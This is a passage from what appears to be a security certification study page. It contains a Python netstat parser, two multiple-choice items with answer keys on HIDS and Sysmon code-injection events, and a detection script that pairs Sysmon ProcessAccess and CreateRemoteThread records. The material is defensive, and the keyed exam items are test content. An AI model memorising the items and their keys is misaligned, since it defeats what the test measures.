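    for raw in text.splitlines():
        m = CONN_RE.match(raw)
        if m:
            proto, local, remote, state, pid = m.groups()
            conns.append({"proto": proto, "local": local, "remote": remote,
                          "state": state or "", "pid": int(pid),
                          "image": None, "components": []})
            continue
        line = raw.strip()
        if not conns or not line:
            continue  # headers before the first connection, blank lines
        if line.startswith("[") and line.endswith("]"):
            conns[-1]["image"] = line[1:-1]
        elif line.startswith("Can not obtain"):
            conns[-1]["image"] = None
        else:
            conns[-1]["components"].append(line)  # service name inside svchost
    return conns


def remote_ip(conn):
    """Strip the port from a Foreign Address (handles [v6]:port too)."""
    host, _, _ = conn["remote"].rpartition(":")
    return host.strip("[]")


def connections_to(conns, ip):
    return [c for c in conns if remote_ip(c) == ip]


def flag_unexpected(conns):
    """Established connections owned by images that have no business talking out."""
    return [c for c in conns
            if c["state"] == "ESTABLISHED"
            and (c["image"] or "").lower() in UNEXPECTED_NETWORK_IMAGES]


if __name__ == "__main__":
    snapshot = parse_netstat_b(NETSTAT_OUTPUT)
    for c in connections_to(snapshot, "192.168.1.50"):
        print(f"{c['proto']} {c['local']} -> {c['remote']} {c['state']} "
              f"PID {c['pid']} [{c['image']}] {c['components']}")
    print("unexpected:", [(c["pid"], c["image"]) for c in flag_unexpected(snapshot)])
```

The same join can be done in PowerShell with Get-NetTCPConnection's OwningProcess property and Get-Process -Id, which is the "additional scripting" the explanation refers to; the value of -b is that it prints the image in one step, and for svchost it also names the hosted service, which is the detail that separates a genuine update check from a malicious service riding inside svchost.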

45
Multi-Selecthard

Which TWO characteristics are typical of host-based intrusion detection systems (HIDS) compared to network-based intrusion detection systems (NIDS)?

Select 2 answers
A.Better suited for protecting a large number of devices simultaneously.
B.Visibility into local system events such as file system changes and registry modifications.
C.Ability to inspect encrypted traffic at the host level.
D.Less susceptible to host-based attacks.
E.Lower latency in detecting network attacks.
AnswersB, C

HIDS monitors host-specific activities.

Why this answer

Option B is correct because HIDS are installed directly on a host and have direct access to the host's operating system, allowing them to monitor local system events such as file system changes, registry modifications and process activity. This granular visibility is a key advantage over NIDS, which only sees network traffic and cannot inspect internal host state. Option C is correct because the HIDS agent runs on the endpoint where TLS sessions terminate, so it can examine the plaintext (through application logs, the decrypted buffers an endpoint agent hooks, or the files written to disk) that a NIDS on the wire sees only as ciphertext.

Exam trap

Cisco often tests the misconception that HIDS are better at detecting network attacks or scaling to many devices, but the key differentiator is that HIDS provide host-level visibility (like registry and file changes) and can inspect decrypted traffic, while NIDS are network-focused and cannot see internal host events.

46
Multi-Selecteasy

Which two Sysmon Event IDs are most commonly associated with code injection techniques?

Select 2 answers
A.Event ID 3 (Network connect)
B.Event ID 8 (CreateRemoteThread)
C.Event ID 1 (Process creation)
D.Event ID 7 (Image loaded)
E.Event ID 10 (ProcessAccess)
AnswersB, E

CreateRemoteThread is a common method for code injection.

Why this answer

Sysmon Event ID 8 (CreateRemoteThread) is directly associated with code injection because it logs when one process creates a thread in another, the final step of the classic OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread sequence. Event ID 10 (ProcessAccess) is the precursor: it records a process opening a handle to another process together with the GrantedAccess mask, and injection needs rights such as PROCESS_VM_OPERATION, PROCESS_VM_WRITE and PROCESS_CREATE_THREAD (often requested as PROCESS_ALL_ACCESS). A high-privilege Event ID 10 followed shortly by an Event ID 8 from the same source into the same target is the signature analysts look for; both events are only as complete as the Sysmon configuration that filters them, since most deployments suppress the noisy low-privilege handle opens.

Exam trap

Cisco often tests the distinction between direct indicators of injection (Event ID 8 and 10) versus indirect artifacts (Event ID 1 or 7), leading candidates to mistakenly choose process creation or image load events as primary injection indicators.
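The pairing described above as detection logic, added here as an example and not part of this page. It runs over constructed Sysmon records (already flattened from Event XML into dicts; PIDs, paths and times are invented), keeps the Event ID 10 handle opens whose GrantedAccess includes the rights injection needs, and reports each one that is followed within a short window by an Event ID 8 from the same source into the same target. The ten-second window is an arbitrary assumption.

```python
from datetime import datetime

# Constructed Sysmon records, flattened from Event XML into dicts (EventID plus
# the EventData fields). PIDs, paths and times are invented.
EVENTS = [
    {"EventID": 10, "UtcTime": "2024-03-03 10:14:01.120",
     "SourceProcessId": 2792, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetProcessId": 3100, "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 8, "UtcTime": "2024-03-03 10:14:01.480",
     "SourceProcessId": 2792, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetProcessId": 3100, "TargetImage": r"C:\Windows\explorer.exe",
     "StartAddress": "0x0000000002A50000", "StartModule": "", "StartFunction": ""},
    {"EventID": 10, "UtcTime": "2024-03-03 10:15:30.005",
     "SourceProcessId": 4120, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetProcessId": 3100, "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1000"},
    {"EventID": 8, "UtcTime": "2024-03-03 10:16:00.000",
     "SourceProcessId": 520, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetProcessId": 5010, "TargetImage": r"C:\Windows\System32\conhost.exe",
     "StartAddress": "0x00007FF9C1A2B3C0", "StartModule": r"C:\Windows\System32\ntdll.dll",
     "StartFunction": "RtlUserThreadStart"},
]

# Process access rights from the Win32 API; all three are needed to write a
# payload into another process and start it.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECTION_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def injection_capable_handles(events):
    """Event ID 10 records whose GrantedAccess includes write + create-thread rights."""
    return [e for e in events
            if e["EventID"] == 10
            and (int(e["GrantedAccess"], 16) & INJECTION_RIGHTS) == INJECTION_RIGHTS]


def correlate_injection(events, window_seconds=10):
    """Pair each injection-capable handle open with a later CreateRemoteThread
    from the same source into the same target within the window."""
    opens = injection_capable_handles(events)
    pairs = []
    for thread in (e for e in events if e["EventID"] == 8):
        t_thread = parse_time(thread["UtcTime"])
        for handle in opens:
            same_pair = (handle["SourceProcessId"] == thread["SourceProcessId"]
                         and handle["TargetProcessId"] == thread["TargetProcessId"])
            delta = (t_thread - parse_time(handle["UtcTime"])).total_seconds()
            if same_pair and 0 <= delta <= window_seconds:
                pairs.append({"source_pid": thread["SourceProcessId"],
                              "source_image": thread["SourceImage"],
                              "target_pid": thread["TargetProcessId"],
                              "target_image": thread["TargetImage"],
                              "granted_access": handle["GrantedAccess"],
                              "start_address": thread["StartAddress"],
                              "start_module": thread["StartModule"],
                              "seconds_between": delta})
    return pairs


if __name__ == "__main__":
    for p in correlate_injection(EVENTS):
        print(f"{p['source_image']} (PID {p['source_pid']}) opened {p['target_image']} "
              f"with {p['granted_access']} and started a thread at {p['start_address']} "
              f"{p['seconds_between']:.2f}s later (module: {p['start_module'] or 'none'})")
```

The empty StartModule on the flagged Event ID 8 is a second signal worth keeping in the alert: a thread whose start address does not fall inside any loaded module is running shellcode, whereas the csrss.exe thread above starts in ntdll.dll and is the kind of routine remote thread that would otherwise drown the rule in noise.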
